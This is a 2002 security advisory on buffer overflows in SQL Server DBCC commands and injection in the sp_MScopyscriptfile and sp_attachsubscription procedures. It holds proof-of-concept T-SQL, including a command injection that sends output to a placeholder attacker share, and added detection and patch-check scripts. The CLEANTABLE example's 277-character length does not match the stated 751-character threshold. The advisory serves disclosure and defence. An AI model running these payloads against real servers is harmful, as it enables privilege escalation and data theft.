Multiple buffer overflows in DBCC and SQL Injections
July 26, 2002
Credit:
This vulnerability was researched and discovered by Cesar Cerrudo (sqlsec@yahoo.com).
To determine if your Microsoft SQL Server installations have this
vulnerability, download AppDetective for Microsoft SQL Server from:
http://www.appsecinc.com/products/appdetective/mssql/
Risk Level: Varying from High to Low
Summary:
Several buffer overflows in the DBCC built-in function and several SQL Injection
vulnerabilities have been discovered in Microsoft SQL Server. Three of the buffer
overflows are in DBCC calls that can be executed by all valid logins on the server.
One of the SQL Injection vulnerabilities can be executed by all valid logins on the server
but only if the SQL Server Agent Proxy is enabled.
Details:
[DBCC INDEXDEFRAG]
Microsoft SQL Server provides a built-in function used to defragment clustered and secondary
indexes of a table or view. This function is called DBCC INDEXDEFRAG. The function accepts three parameters.
The DBCC INDEXDEFRAG function does not properly allocate enough memory when called with a long string
as the second parameter. This causes the stack to be overwritten and allows an attacker to inject code
onto the stack to be executed.
On Microsoft SQL Server 2000, the overflow occurs when a buffer of 3275 characters
or greater is passed into the first parameter. Below is an example.
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('A', 3275))
DBCC INDEXDEFRAG ( '', @test, '')
DBCC INDEXDEFRAG is a built-in function and as such can not be removed from SQL Server and
permissions to execute the function can not be revoked or denied. Because of these factors,
any non-privileged login can gain full control of the server. This vulnerability can not be used
without a valid SQL Server connection.
[DBCC SHOWCONTIG]
Microsoft SQL Server provides a built-in function used to display
fragmentation information for the data and indexes of the specified table.
This function is called DBCC SHOWCONTIG. The function accepts two parameters.
The DBCC SHOWCONTIG function does not properly allocate enough memory when
called with a long string as the first parameter. This causes the stack to
be overwritten and allows an attacker to inject code onto the stack to be executed.
On Microsoft SQL Server 2000, the overflow occurs when a buffer of
4303 characters or greater is passed into the first parameter. Below is an example.
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('A', 4303))
DBCC SHOWCONTIG (@test, '')
DBCC SHOWCONTIG is a built-in function and as such can not be removed
from SQL Server and permissions to execute the function can not be revoked
or denied. Because of these factors, any non-privileged login can gain full
control of the server. This vulnerability can not be used without a valid SQL Server connection.
[DBCC CLEANTABLE]
Microsoft SQL Server provides a built-in function used to reclaim
space for dropped variable length columns and text columns. This
function is called DBCC CLEANTABLE. The function accepts three parameters.
The DBCC CLEANTABLE function does not properly allocate enough memory
when called with a long string as the first parameter. This causes the
stack to be overwritten and allows an attacker to inject code onto the stack to be executed.
On Microsoft SQL Server 2000, the overflow occurs when a buffer of
751 characters or greater is passed into the first parameter. Below is an example.
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('A', 277))
DBCC CLEANTABLE ( '', @test)
DBCC CLEANTABLE is a built-in function and as such can not be removed from
SQL Server and permissions to execute the function can not be revoked or denied.
Because of these factors, any non-privileged login can gain full control of the server.
This vulnerability can not be used without a valid SQL Server connection.
[DBCC addextendedproc]
Microsoft SQL Server provides a built-in function to add extended stored
procedures. This function is called DBCC addextendedproc. The function
accepts two parameters, a name for the procedure and a file name.
The DBCC addextendedproc function does not properly allocate enough
memory when called with a long string as the second parameter. This
causes the stack to be overwritten and allows an attacker to inject
code onto the stack to be executed.
The overflow occurs when a buffer of 4100 characters or greater
is passed into the second parameter. Below is an example.
DBCC addextendedproc ('xp_hello', 'XXX[4100+]')
DBCC addextendedproc is a built-in function and as such can not
be removed from SQL Server. DBCC addextendedproc permissions default
to members of the sysadmin fixed server role and are not transferable.
This vulnerability can be used to elevate privileges to the operating
system or other instances on the server.
[DBCC CHECKCONSTRAINTS]
Microsoft SQL Server provides a built-in function used to
check the integrity of a specified constraint or all
constraints on a specified table. This function is called
DBCC CHECKCONSTRAINTS. The function accepts one parameter.
The DBCC CHECKCONSTRAINTS function does not properly allocate
enough memory when called with a long string as the first parameter.
This causes the stack to be overwritten and allows an attacker to inject
code onto the stack to be executed.
On Microsoft SQL Server 2000, the overflow occurs when a buffer of
751 characters or greater is passed into the first parameter. Below is an example.
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('A',751))
DBCC CHECKCONSTRAINTS (@test)
DBCC CHECKCONSTRAINTS is a built-in function and as such can not
be removed from SQL Server. DBCC CHECKCONSTRAINTS permissions default
to members of the sysadmin fixed server role and the db_owner fixed
database role, and are not transferable. This vulnerability can be used
to escalate privileges from db_owner to sysadmin.
[sp_MScopyscriptfile]
The stored procedure sp_MScopyscriptfile creates a directory in the
SQL Server replication directory and then copies a script file into it.
The only parameter to this stored procedure is @scriptfile and this parameter
represents the name of the script file to be copied. Arbitrary operating
system commands can be injected into values passed to this parameter and
those commands are then executed by xp_cmdshell.
Below is an example of exploiting this vulnerability.
declare @command varchar(100)
declare @scriptfile varchar(200)
set concat_null_yields_null off
select @command='dir c:\ > "\\attackerip\share\dir.txt"'
select @scriptfile='c:\autoexec.bat > nul" | ' + @command + ' | rd "'
exec sp_MScopyscriptfile @scriptfile ,''
This vulnerability can only be exploited if the SQL Server Agent Proxy account
is enabled. This service is not enabled by default but if it is all valid logins
on the server can execute this stored procedure.
[sp_attachsubscription]
The stored procedure sp_attachsubscription can only be executed
by users with the db_owner fixed database role. Below is an example of
how this stored procedure can be used to elevate privileges to full dba.
set concat_null_yields_null off
declare @cmd varchar(300)
set @cmd='d:\auto.bat" "d:\test.bat' + char(10) + char(13)
exec sp_attachsubscription 'test', @cmd
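The following T-SQL is added here as a detection example for the DBCC buffer overflows and the two stored procedure injection issues described above; it is not part of the original advisory and is not Microsoft's code. It scores captured batch text for the call shapes this advisory documents. The @batches rows are constructed sample data (an assumption for illustration); in practice the LoginName and TextData columns would be loaded from a server-side trace with fn_trace_gettable. The 700-character threshold is a heuristic chosen to sit below the smallest trigger length the advisory states, and matching assumes the default case-insensitive collation.

```sql
-- Added example (not from the original advisory): audit captured batch text for
-- the call shapes this advisory describes. The @batches rows are constructed
-- sample data; in practice TextData comes from a server-side trace, e.g.
--   SELECT LoginName, TextData FROM ::fn_trace_gettable('c:\trace\audit.trc', default)
-- Matching assumes a case-insensitive collation (the SQL Server default).
SET NOCOUNT ON
DECLARE @batches TABLE (id int IDENTITY(1,1), LoginName sysname, TextData varchar(8000))

-- benign maintenance call: should not be flagged
INSERT @batches (LoginName, TextData)
  VALUES ('reportuser', 'DBCC SHOWCONTIG (''Orders'')')
-- replicate()-built argument to a DBCC command named in the advisory
INSERT @batches (LoginName, TextData)
  VALUES ('reportuser', 'DECLARE @t varchar(8000) SET @t = (SELECT replicate(''A'', 4303)) DBCC SHOWCONTIG (@t, '''')')
-- shell metacharacters inside the @scriptfile argument
INSERT @batches (LoginName, TextData)
  VALUES ('app', 'exec sp_MScopyscriptfile ''c:\x.bat > nul" | dir c:\ | rd "''')
-- embedded double quote in the sp_attachsubscription argument
INSERT @batches (LoginName, TextData)
  VALUES ('dbo_user', 'exec sp_attachsubscription ''test'', ''d:\a.bat" "d:\b.bat''')
-- ordinary query: should not be flagged
INSERT @batches (LoginName, TextData)
  VALUES ('app', 'SELECT * FROM Orders WHERE OrderID = 42')

SELECT id, LoginName, finding, LEFT(TextData, 60) AS snippet
FROM (
  SELECT id, LoginName, TextData,
    CASE
      -- the five DBCC commands from the advisory, with a replicate()-built or
      -- very long argument (700 is a heuristic below the smallest stated trigger)
      WHEN (TextData LIKE '%DBCC%INDEXDEFRAG%' OR TextData LIKE '%DBCC%SHOWCONTIG%'
            OR TextData LIKE '%DBCC%CLEANTABLE%' OR TextData LIKE '%DBCC%CHECKCONSTRAINTS%'
            OR TextData LIKE '%DBCC%addextendedproc%')
           AND (TextData LIKE '%replicate(%' OR LEN(TextData) > 700)
        THEN 'DBCC call with oversized argument'
      -- pipe, redirect or quote characters reaching the xp_cmdshell command line
      WHEN TextData LIKE '%sp_MScopyscriptfile%'
           AND (TextData LIKE '%|%' OR TextData LIKE '%>%' OR TextData LIKE '%"%')
        THEN 'sp_MScopyscriptfile with shell metacharacters'
      -- quote or CR/LF (literal or built with char(10)/char(13)) in the argument
      WHEN TextData LIKE '%sp_attachsubscription%'
           AND (TextData LIKE '%"%' OR TextData LIKE '%' + CHAR(10) + '%'
                OR TextData LIKE '%' + CHAR(13) + '%' OR TextData LIKE '%char(1[03])%')
        THEN 'sp_attachsubscription with quote or line break'
      ELSE NULL
    END AS finding
  FROM @batches
) AS scored
WHERE finding IS NOT NULL
ORDER BY id
```

Against the sample rows the query returns ids 2, 3 and 4; the plain DBCC SHOWCONTIG call and the ordinary SELECT are not reported. A non-sysadmin login appearing against the DBCC addextendedproc or DBCC CHECKCONSTRAINTS finding is worth a closer look, since those commands should only come from the roles listed above.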
Fix:
To fix these problems, you should install hotfix 8.00.655 in addition to Service Pack 2 of SQL Server 2000.
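The following T-SQL is added here as an example of checking an instance against the fix level stated above; it is not part of the original advisory and is not Microsoft's tooling. It reads the build from SERVERPROPERTY('ProductVersion') (a string such as '8.00.655') and the service pack from SERVERPROPERTY('ProductLevel'), and reports whether a SQL Server 2000 instance is below hotfix 8.00.655. The PRINT messages and the parsing of the dotted version string are assumptions of this example.

```sql
-- Added example (not from the original advisory): compare the running build
-- against the hotfix level named in the Fix section (8.00.655 on SP2).
DECLARE @version varchar(32), @level varchar(32), @parts int, @major int, @build int

SET @version = CONVERT(varchar(32), SERVERPROPERTY('ProductVersion'))  -- e.g. '8.00.655'
SET @level   = CONVERT(varchar(32), SERVERPROPERTY('ProductLevel'))    -- e.g. 'SP2'

-- ProductVersion has three dotted parts on SQL Server 2000 ('8.00.655') and four
-- on later releases ('9.00.1399.06'); PARSENAME counts parts from the right,
-- so the major version is the last part and the build is (parts - 2).
SET @parts = LEN(@version) - LEN(REPLACE(@version, '.', '')) + 1
SET @major = CONVERT(int, PARSENAME(@version, @parts))
SET @build = CONVERT(int, PARSENAME(@version, @parts - 2))

IF @major IS NULL OR @build IS NULL
    PRINT 'Could not parse ProductVersion: ' + ISNULL(@version, '(null)')
ELSE IF @major = 8 AND @build < 655
    PRINT 'VULNERABLE: SQL Server 2000 build ' + @version + ' (' + @level
        + ') is below hotfix 8.00.655'
ELSE IF @major = 8
    PRINT 'OK: SQL Server 2000 build ' + @version + ' (' + @level
        + ') is at or above hotfix 8.00.655'
ELSE
    PRINT 'Not SQL Server 2000 (major version ' + CONVERT(varchar(4), @major)
        + '); the build check in this advisory does not apply'
```

Run the script once per instance; the check is purely on the reported build, so an instance patched to a later cumulative build also reports OK.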
CVE Reference:
CAN-2001-0644
Additional information:
http://www.microsoft.com/technet/security/bulletin/MS02-034.asp